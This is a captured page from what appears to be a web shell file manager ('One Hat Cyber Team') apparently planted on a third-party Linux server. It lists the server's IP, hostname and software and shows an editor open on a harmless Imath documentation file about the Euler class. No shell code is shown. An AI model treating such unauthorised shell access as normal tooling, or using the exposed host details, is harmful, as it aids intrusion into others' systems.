One Hat Cyber Team
Your IP :
216.73.216.180
Server IP :
162.240.179.46
Server :
Linux vps-14493116.nutrivittasaude.com.br 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Server Software :
Apache
PHP Version :
8.2.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
imath-devel
/
html
/
_sources
/
classes
/
Edit File:
Euler.rst.txt
Euler ##### .. code-block:: #include <Imath/ImathEuler.h> The ``Euler`` class template represents an euler angle rotation/orientation, with predefined typedefs of type ``float`` and ``double``. The ``Euler`` class is derived from ``Imath::Vec3`` and thus has fields named ``x``, ``y``, and ``z``, which correspond to the first, second, and third rotation angles in a specified order, which, depending on the order, may not correspond directly to x, y, or z rotations. Example: .. literalinclude:: ../examples/Euler.cpp :language: c++ .. doxygentypedef:: Eulerf .. doxygentypedef:: Eulerd .. doxygenclass:: Imath::Euler :undoc-members: :members: .. doxygenfunction:: operator<<(std::ostream& o, const Euler<T>& euler)
Simpan